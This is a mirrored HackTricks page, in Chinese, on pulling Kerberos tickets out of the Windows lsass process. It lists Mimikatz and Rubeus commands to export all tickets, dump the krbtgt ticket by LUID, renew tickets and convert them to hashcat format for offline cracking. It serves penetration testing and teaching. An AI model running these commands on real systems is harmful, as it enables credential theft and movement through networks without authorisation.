mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
42 lines
1.8 KiB
Markdown
42 lines
1.8 KiB
Markdown
# 从Windows中提取票证
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|
||
|
||
Windows中的票证由**lsass**(本地安全授权子系统服务)进程管理和存储,该进程负责处理安全策略。要提取这些票证,必须与lsass进程进行交互。非管理员用户只能访问自己的票证,而管理员则有权提取系统上的所有票证。对于此类操作,工具**Mimikatz**和**Rubeus**被广泛使用,各自提供不同的命令和功能。
|
||
|
||
### Mimikatz
|
||
|
||
Mimikatz是一个多功能工具,可以与Windows安全进行交互。它不仅用于提取票证,还用于各种其他与安全相关的操作。
|
||
```bash
|
||
# Extracting tickets using Mimikatz
|
||
sekurlsa::tickets /export
|
||
```
|
||
### Rubeus
|
||
|
||
Rubeus 是一个专门用于 Kerberos 交互和操作的工具。它用于票据提取和处理,以及其他与 Kerberos 相关的活动。
|
||
```bash
|
||
# Dumping all tickets using Rubeus
|
||
.\Rubeus dump
|
||
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
|
||
|
||
# Listing all tickets
|
||
.\Rubeus.exe triage
|
||
|
||
# Dumping a specific ticket by LUID
|
||
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
|
||
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
|
||
|
||
# Renewing a ticket
|
||
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
|
||
|
||
# Converting a ticket to hashcat format for offline cracking
|
||
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
|
||
```
|
||
使用这些命令时,请确保将占位符如 `<BASE64_TICKET>` 和 `<luid>` 替换为实际的 Base64 编码票证和登录 ID。这些工具提供了广泛的功能,用于管理票证和与 Windows 的安全机制进行交互。
|
||
|
||
## 参考
|
||
|
||
- [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
|
||
|
||
{{#include ../../banners/hacktricks-training.md}}
|